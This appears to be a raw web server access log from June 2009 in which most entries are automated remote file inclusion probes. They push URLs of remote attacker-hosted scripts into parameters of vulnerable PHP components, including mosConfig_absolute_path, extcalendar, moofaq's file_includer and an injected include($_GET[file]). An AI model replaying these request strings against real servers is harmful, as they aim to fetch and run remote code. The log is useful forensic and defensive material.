201.158.150.180 - - [21/Jun/2009:05:17:17 -0400] "GET /logs/access_log.Q109052400%20%20//modules/TotalCalendar/about.php?inc_dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:18:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.48.127.79 - - [21/Jun/2009:05:19:07 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:05:19:07 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:05:19:07 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:05:19:30 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:19:59 -0400] "GET //?custompluginfile%5B%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:19:59 -0400] "GET /logs//?custompluginfile%5B%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 6381 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:19:59 -0400] "GET /logs/access_log.Q109051600%20%20//?custompluginfile%5B%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:20:09 -0400] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:20:09 -0400] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:20:09 -0400] "GET /logs/access_log.Q109061100/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:20:14 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:20:29 -0400] "GET /logs/access_log.Q109051900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:20:38 -0400] "GET /logs/access_log.Q109061400%20%20//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:05:20:51 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:20:52 -0400] "GET /logs/access_log.Q109051900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:05:21:07 -0400] "GET /images/download_coming_soon.jpg HTTP/1.1" 200 4237 "-" "Googlebot-Image/1.0"
124.217.216.86 - - [21/Jun/2009:05:21:26 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:21:26 -0400] "GET ///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:21:26 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:21:33 -0400] "GET /logs/access_log.Q109060900//?custompluginfile%5B%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:21:34 -0400] "GET /logs/access_log.Q109052800%20%20//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:05:21:54 -0400] "GET /logs/access_log.Q109051600//?custompluginfile%5B%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:22:10 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.188.254.4 - - [21/Jun/2009:05:22:15 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:22:55 -0400] "GET /logs////includes/db_connect.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:22:55 -0400] "GET ////includes/db_connect.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:22:56 -0400] "GET /logs/access_log.Q109052100////includes/db_connect.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:23:20 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:23:20 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:23:20 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:23:30 -0400] "GET /logs/access_log.Q109052200////includes/db_connect.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:23:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.188.254.4 - - [21/Jun/2009:05:23:53 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.therockcc.org/calendarevents/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:05:23:56 -0400] "GET /logs/access_log.Q109060100/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:23:59 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:05:24:02 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.53.70.114 - - [21/Jun/2009:05:25:27 -0400] "GET /modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
74.53.70.114 - - [21/Jun/2009:05:25:27 -0400] "GET /logs/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:25:55 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.34.181.87 - - [21/Jun/2009:05:26:27 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.christian-schumach.at/temp/pit-id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
64.34.181.87 - - [21/Jun/2009:05:26:27 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.christian-schumach.at/temp/pit-id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
64.34.181.87 - - [21/Jun/2009:05:26:27 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.christian-schumach.at/temp/pit-id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
91.149.157.130 - - [21/Jun/2009:05:27:15 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:27:15 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:27:15 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:27:25 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.181.87 - - [21/Jun/2009:05:27:33 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.christian-schumach.at/temp/pit-id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
218.246.20.221 - - [21/Jun/2009:05:27:45 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:05:27:56 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:28:04 -0400] "GET /logs/access_log.Q109060100/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:28:10 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:28:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.149.157.130 - - [21/Jun/2009:05:28:39 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:28:50 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:05:31:25 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:05:31:54 -0400] "GET /logs/access_log.Q109052800//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:32:22 -0400] "GET //nowplaying.php/playing.php/common/db.php?commonpath=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:32:22 -0400] "GET /logs/access_log.Q109050800//nowplaying.php/playing.php/common/db.php?commonpath=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:32:22 -0400] "GET /logs//nowplaying.php/playing.php/common/db.php?commonpath=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:05:32:22 -0400] "GET /logs/access_log.Q109060100//nowplaying.php/playing.php/common/db.php?commonpath=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:05:33:06 -0400] "GET //include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:05:33:07 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:05:33:07 -0400] "GET /logs//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:05:33:08 -0400] "GET /logs/access_log.Q109051300%20%20//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:33:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.216.86 - - [21/Jun/2009:05:36:17 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:05:36:24 -0400] "GET /logs/access_log.Q109061300%20///vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:05:36:24 -0400] "GET /logs///vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:05:36:24 -0400] "GET ///vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.826"
209.59.12.99 - - [21/Jun/2009:05:38:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [21/Jun/2009:05:39:41 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:05:39:47 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:05:40:12 -0400] "GET /logs/access_log.Q109052600/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.250.85.185 - - [21/Jun/2009:05:40:51 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
61.250.85.185 - - [21/Jun/2009:05:40:52 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.250.85.185 - - [21/Jun/2009:05:40:52 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
216.17.99.13 - - [21/Jun/2009:05:41:47 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:05:42:42 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
91.149.157.130 - - [21/Jun/2009:05:43:05 -0400] "GET /bbs/skin/zero_vote/login.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:43:05 -0400] "GET /logs/bbs/skin/zero_vote/login.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:43:05 -0400] "GET /logs/access_log.Q109051500/bbs/skin/zero_vote/login.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.96.227.93 - - [21/Jun/2009:05:43:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
86.96.226.93 - - [21/Jun/2009:05:43:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
86.96.226.93 - - [21/Jun/2009:05:43:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
86.96.227.93 - - [21/Jun/2009:05:43:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.43.202.66 - - [21/Jun/2009:05:43:22 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:43:22 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:43:22 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:43:25 -0400] "GET /logs/access_log.Q109052100/bbs/skin/zero_vote/login.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:05:43:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [21/Jun/2009:05:43:47 -0400] "GET ///include/print_category.php?setup[use_category]=1&dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:05:43:47 -0400] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:05:43:47 -0400] "GET /logs/access_log.Q109051700///include/print_category.php?setup[use_category]=1&dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:05:44:01 -0400] "GET /logs/access_log.Q109051500///include/print_category.php?setup[use_category]=1&dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:44:33 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:44:33 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:44:33 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.250.85.185 - - [21/Jun/2009:05:45:54 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
61.250.85.185 - - [21/Jun/2009:05:45:55 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.250.85.185 - - [21/Jun/2009:05:45:55 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:05:46:25 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:05:46:25 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:05:46:25 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
61.250.85.185 - - [21/Jun/2009:05:47:10 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
217.147.29.190 - - [21/Jun/2009:05:47:15 -0400] "GET /logs/access_log.Q109051700%20%20///include/print_category.php?setup[use_category]=1&dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:47:31 -0400] "GET /logs/access_log.Q109051500%20%20/bbs/skin/zero_vote/login.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:05:47:41 -0400] "GET /logs/access_log.Q109052100%20%20/bbs/skin/zero_vote/login.php?dir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.234.107.233 - - [21/Jun/2009:05:47:43 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
209.59.12.99 - - [21/Jun/2009:05:48:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.82.142 - - [21/Jun/2009:05:48:46 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:05:48:46 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:05:49:55 -0400] "GET /images/over-index6_Shoecvrs.jpg HTTP/1.1" 200 3773 "-" "Googlebot-Image/1.0"
94.23.200.54 - - [21/Jun/2009:05:50:11 -0400] "GET /logs/access_log.Q109061100///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:05:50:11 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:05:50:11 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 6382 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:05:50:15 -0400] "GET /logs/access_log.Q109060300///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:50:15 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.43.202.66 - - [21/Jun/2009:05:50:18 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.189.224.21 - - [21/Jun/2009:05:50:22 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:05:50:22 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.811"
